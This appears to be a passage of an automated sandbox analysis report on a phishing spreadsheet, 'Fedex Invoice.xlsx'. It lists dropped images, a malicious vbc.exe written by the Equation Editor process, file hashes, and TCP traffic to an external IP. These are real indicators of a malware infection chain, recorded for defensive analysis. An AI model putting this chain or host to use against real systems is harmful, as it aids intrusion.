        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8149A23.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84E7AC2.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD1CC9A1.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2C85D57.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C385632E.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBE0C5C8.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDD787DB.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3F2487D.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DC676C.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB6B38D.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):7788
        Entropy (8bit):5.545721180717153
        Encrypted:false
        SSDEEP:96:wl9nCblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wlgTNAK4oOIGbK1RvVwPAWmOHX
        MD5:BB62EE5F443BE2B2F4A6F0E9EC912168
        SHA1:0D21B1AE8F63B685973BB4AAE35D2AED0C83EA7A
        SHA-256:4EDC5BF1DE52C07FA92BEBF60D08ACD4E9D05F7022D19FB5E30A8D67F0C16C5B
        SHA-512:5FA3208CAD6032E161760DB40702CA1853BB32B911781FA0A47D0154B48B7AF7BCA3A0F7466C11E9E5F9B241A754A094B32B2E2662A95D1CBD0255F633AF8DA7
        Malicious:false
        Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................{.6.).X...H...d.............................p....\...............l.....p........<5.u..p....`.p.){.$y.w..W...$.....(......w..W.$.......d............^.p.....^.p..W...W.H.M...$.-...T....<.w................<.9u.Z.v....X..n.....){........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
        C:\Users\user\Desktop\~$Fedex Invoice.xlsx
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\Public\vbc.exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:CDFV2 Encrypted
        Entropy (8bit):7.9881378434771335
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:Fedex Invoice.xlsx
        File size:611032
        MD5:ec7f52b07d135f71c63fd20054a89646
        SHA1:c89fa952eaef37a4ad0a120fa2c998cd989bbf62
        SHA256:150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
        SHA512:9ec0b0a89afe4b685e5aa6ae3e0c1d861ca84f6c31aee88c0ded285fb1b7d31a74259090bdd18036cfb832ccc74a7b36815a25e0294d6d9bf566d794fb24134e
        SSDEEP:12288:NLW1VYUxaXgVhBLvyO60L3g5lA/UeQQMPSv3QphFG93f:NLW1V/xugVhBLvyOSleePSIU3f
        File Content Preview:........................>.......................................................................................y..............................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4b4bcb4

        Network Behavior

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Sep 14, 2021 21:51:37.408901930 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.437874079 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.438127041 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.438657045 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.473706961 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473750114 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473776102 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473799944 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.473925114 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505139112 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505177975 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505202055 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505218983 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505224943 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505240917 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505244970 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505254984 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505264997 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505284071 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505297899 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505306959 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505328894 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505332947 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.505342960 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.505373955 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.538853884 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538897038 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538923025 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538944960 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538969040 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.538985014 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539002895 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539009094 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539021015 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539028883 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539041042 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539057970 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539078951 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539083958 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539096117 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539109945 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539130926 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539149046 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539165974 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539181948 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.539223909 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.539238930 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.541033030 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.567837954 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.567939997 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568125010 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568146944 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568167925 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568181038 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568181992 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568196058 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568208933 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568222046 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568233013 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568247080 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568263054 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568269014 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568280935 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568289995 CEST4916580192.168.2.22212.192.246.25
